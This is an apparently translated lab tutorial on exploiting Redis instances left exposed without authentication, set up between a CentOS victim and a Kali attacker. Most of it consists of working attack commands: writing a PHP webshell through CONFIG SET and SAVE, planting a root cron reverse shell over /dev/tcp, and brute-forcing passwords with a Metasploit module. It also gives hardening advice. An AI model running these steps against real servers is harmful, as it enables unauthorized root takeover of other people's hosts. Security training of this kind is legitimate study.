Redis is a cross-platform, in-memory, non-relational (key-value) database. The data held in memory can be persisted to disk and loaded again on restart. It supports strings, hashes, lists, sets, sorted sets, bitmaps, HyperLogLogs and other data types.
Vulnerability Principle
When Redis listens on its default port 6379 on a public-facing interface with no password (or a weak one), anyone on the Internet can connect without authentication, read all of the stored data, and abuse Redis's own commands (CONFIG SET dir / dbfilename followed by SAVE) to write a file with attacker-controlled content to any path the Redis process can write to. When Redis runs as root, as in this lab, that file write is enough to take over the host.
Experimental Environment
CentOS 7 (public network, victim end)
Kali Linux (attack end)
Installing Redis
We first install Redis on CentOS. Execute the following commands one at a time:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz #Download
tar xzf redis-2.8.17.tar.gz #Extract
cd redis-2.8.17
make #Compile
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd .. #Back to the redis-2.8.17 directory, where redis.conf lives
cp redis.conf /etc/
redis-server /etc/redis.conf
Note that port 6379 must be opened both in the host firewall and in the cloud security group. Redis 2.8.x is deliberately old: its redis.conf ships with the bind line commented out and has no protected mode, so the server listens on every interface as soon as it starts, which is exactly the exposure this lab reproduces.
Unauthorized Test
From Kali we connect directly with redis-cli; no password is requested and we land in an interactive session:
redis-cli -h 8.219.xxx.xxx
With Redis 3.2 and later the defaults are safer: redis.conf ships with bind 127.0.0.1 active and protected-mode yes, so a fresh install only answers on loopback and refuses remote clients with a DENIED error. To reproduce the exposure on a newer version you must comment out the bind line (or widen it to 0.0.0.0), set protected-mode to no, and restart the server. Hardening a real deployment is the reverse of that: keep bind restricted, leave protected mode on, set requirepass to a strong password, and rename or disable CONFIG with rename-command so that the file-write primitive below is not available even to an authenticated client.
Use redis to write webshell
To write a webshell through Redis we must know the web root of the target site. Without it the file lands somewhere the web server never serves, so even a successfully written shell cannot be reached. Assuming the web root is /var/www/html, run the following inside the redis-cli session:
config set dir /var/www/html #Directory the RDB dump is written to
config set dbfilename kali.php #Name of the dump file, i.e. our webshell
set xxx "\r\n\r\n<?php phpinfo(); ?>\r\n\r\n" #Store the payload as a value; the blank lines keep it on its own line among the binary RDB data
save #Flush the dataset to /var/www/html/kali.php
Use double quotes for the value: redis-cli only interprets \r\n escapes inside double-quoted strings, so with single quotes the backslashes would be written literally. Once save returns OK, request kali.php from the web server; the phpinfo() page is rendered in the middle of the RDB garbage.
Bounce Shell
We start a listener on Kali with nc:
nc -lvp 5555
Next we reuse the same file-write primitive to drop a crontab entry for root that connects back to our listener every minute:
config set dir /var/spool/cron #Root crontab directory on CentOS (Debian/Ubuntu use /var/spool/cron/crontabs)
config set dbfilename root #Crontab file for the root user
set xxx "\n\n* * * * * /bin/bash -i >& /dev/tcp/<Kali IP>/5555 0>&1\n\n" #Reverse shell: five time fields, then bash with stdin/stdout/stderr tied to the TCP socket
save
Within a minute cron runs the entry and a root shell connects back to the nc listener. This works on CentOS because its cron tolerates the binary RDB bytes surrounding the entry; on Debian/Ubuntu the same crontab is commonly rejected as malformed, so there the webshell route is the more reliable one.
Redis password cracking
In real deployments a password is usually set with requirepass in redis.conf, so the unauthenticated steps above fail with a NOAUTH error. To simulate that here, set requirepass in /etc/redis.conf and restart the server, then fall back to a dictionary attack against AUTH.
Configure msf
msfconsole
use auxiliary/scanner/redis/redis_login
set RHOSTS 8.219.xxx.xxx
set PASS_FILE /root/22.txt #Set password dictionary
run
Metasploit has several other Redis modules (scanning and exploitation); list them with:
search redis
Each needs only a few options (RHOSTS and, where relevant, the password) before it can be run.